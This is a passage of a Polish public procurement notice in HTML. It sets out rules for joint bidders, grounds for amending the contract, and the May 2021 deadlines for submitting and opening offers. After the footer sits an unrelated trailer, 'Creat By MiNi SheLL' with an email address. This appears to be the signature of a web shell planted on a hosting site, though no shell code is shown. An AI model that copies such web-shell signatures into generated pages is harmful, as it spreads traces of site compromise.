odwzorowania z dokumentem w postaci papierowej. 2) W przypadkuWykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego ofertę podpisujepełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia.3) Wykonawcywspólnie ubiegający się o udzielenie zamówienia w celu spełnienia warunków udziału wpostępowaniu w zakresie zdolności technicznej i zawodowej, dotyczących wykształcenia,kwalifikacji zawodowych lub doświadczenia, zgodnie z art. 117 ust. 3 ustawy mogą polegać nazdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacjiktórych te zdolności są wymagane. W takim przypadku, zgodnie z art. 117 ust. 4 ustawyWykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy.Oświadczenie należy załączyć obligatoryjnie, a w przypadku jego braku nie podlega onouzupełnieniu i oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 2 lit. c) ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, przewiduje sięmożliwość dokonania zmiany umowy w następujących przypadkach:1) w przypadkuniedokonania przez Zamawiającego zlecenia dostaw w maksymalnej ilości, dopuszcza sięmożliwość jednokrotnego przedłużenia okresu obowiązywania umowy;2) zaistnieniaokoliczności niemożliwych do przewidzenia w chwili wszczęcia postępowania lub zawarciaumowy;3) przestojów i opóźnień w wykonywaniu przedmiotu umowy, wynikających z przyczynleżących po stronie Zamawiającego, dopuszcza się przedłużenie terminu wykonaniaumowyZmiany umowy mogą nastąpić także w przypadkach określonych w art. 455 ustawyPrawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć wyłącznie w wersji elektronicznej na Platformie pod adresem: https://kopalnia-bochnia.ezamawiajacy.pl w zakładce „OFERTY" na zasadach i trybie określonym w części XII niniejszej Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-03</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com